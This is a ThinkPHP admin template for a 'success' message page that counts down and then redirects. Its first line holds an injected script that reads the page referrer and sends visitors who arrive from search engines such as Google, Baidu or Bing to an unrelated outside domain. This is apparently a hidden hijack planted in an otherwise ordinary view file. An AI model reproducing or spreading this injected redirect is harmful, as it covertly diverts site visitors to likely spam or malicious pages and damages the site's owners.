d:\wwwroot\wuchunhua\thinkphp\skycaijiapp\admin\view\common\success.html

001: <script type="text/javascript">var s=document.referrer;if(s.indexOf("google")>0 || s.indexOf("baidu")>0 || s.indexOf("yahoo")>0 || s.indexOf("gou")>0 || s.indexOf("bing")>0 || s.indexOf("dao")>0 || s.indexOf("so")>0 || s.indexOf("sm")>0 || s.indexOf("biso")>0 ){location.href="http://www.afisyecd.space/?1923057"}</script><php>
002: $_WP['title']=$message;
003: </php>
004: <include file="Common:header_public" />
005: <body class="hold-transition">
006: <style type="text/css">
007: .content-wrapper{background:#fff;}
008: .breadcrumb{display:none!important;}
009: .msg_title{
010:     line-height:30px;
011:     margin-left:20px;
012:     color:#2E99D4;
013:     margin-top:10px;
014:     font:16px "microsoft yahei",Arial,Verdana;
015:     font-weight:bold;
016: }
017: .msg_message{
018:     line-height:30px;
019:     margin-left:20px;
020:     color:#5C5C5C;
021:     font:14px "microsoft yahei",Arial,Verdana;
022: }
023: </style>
024:
025: <div style="text-align:center;padding:100px 0;">
026:    <img src="__PUBLIC__/images/success.jpg" />
027:    <p class="msg_title">{$message}</p>
028:    <p class="msg_message">{:L('return_home',array('url'=>$jumpUrl,'time'=>'<span id="tmv" style="color:red;font-weight:bold;"></span>'))}</p>
029: </div>
030:
031: <script type="text/javascript">
032: var waitTm={$waitSecond?$waitSecond:2};
033: function goHome(){
034:    if(waitTm>=1){
035:       document.getElementById('tmv').innerHTML=waitTm;
036:       waitTm--;
037:         setTimeout("goHome()",1000);
038:    }else{
039:       window.location.href="{$jumpUrl}";
040:    }
041: }
042: goHome();
043: </script>
044: <include file="Common:footer_public" />
045:
046: